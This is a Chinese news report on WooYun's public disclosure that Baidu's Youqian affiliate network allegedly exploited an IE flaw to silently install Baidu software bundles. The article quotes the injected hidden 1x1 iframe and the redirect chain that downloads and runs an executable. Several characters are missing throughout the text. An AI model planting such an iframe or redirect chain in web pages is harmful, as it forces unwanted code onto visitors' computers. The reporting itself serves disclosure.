12月8日消息,漏洞 告平台乌云昨晚18:48分在其 站公开了“百度有钱联盟利用IE漏洞推广安装软件”漏洞的细节,乌云 站显示,该漏洞12月3日提供给百度但是百度忽略了该漏洞,因此按照流程,乌云于昨晚对外正式公开了该漏洞的细节。
12月3日23:56乌云在其 站上公开了一个标题为“百度有钱联盟利用IE漏洞推广安装软件”的缺陷,缺陷编 为WooYun-2014-85575,危害等级为高。在该漏洞提交给百度后,百度称该行为是渠道商行为,并忽略了该漏洞。
因此乌云于昨晚正式对外公布了该漏洞细节。乌云 站描述称:“女盆友要看片,找啊找的就找到家影音站,然后电脑咻的自动装上了百度杀毒/卫士/浏览器/输入法一家子。安装包来自百度有钱联盟,144MB啊亲,电脑快卡死了有没有。”
“在费很大气把电脑救活之后,在一堆浏览器的历史记录找到了这个链接
http://www.80ydw.com/movie/693.html
通过查看页面源代码,可以看到嵌入了如下代码:
<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>
再查看http://hpa.pw/HHH的全文代码,会发现这个页面会跳转到
http://221.233.160.110/images/xml.html,最终通过该页面,下载并自动执行
http://dlsw.br.baidu.com/ditui/BaiduYouQianPartPackSilent_1.1.0.10_150946.exe,没错,来自百度有钱联盟的144MB的安装包。”
乌云 站还公开了两份该漏洞的证据,证明该漏洞来自百度有钱联盟,并使用了百度数字证书,下载链接也指向了百度官方软件下载包。
最近几天卡饭等专业论坛以及新浪微博也有多位 友曝光,在访问百度影音联盟 站时,电脑自动下载运行了百度杀毒、百度卫士、百度浏览器和百度输入法等一系列百度软件。
安全专家称,漏洞是木马病毒入侵的一个主要通道,黑客利用漏洞在 站挂马,一旦有人访问电脑就会自动下载运行病毒,这原本是一种病毒行为,百度有钱联盟却以此方式来推广软件,采用的就是病毒方式。
虽然百度回应称此为渠道行为,但百度百科很清楚地显示:“百度有钱联盟属于百度旗下线下推广平台,致力于帮助合作伙伴推广自身品牌和产品,同时为推广客户提供丰厚回 。目前上线的产品有,百度杀毒, 百度卫士,百度浏览器等,后续还会有更多的百度产品上线。”百度有钱联盟就是百度旗下平台。
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!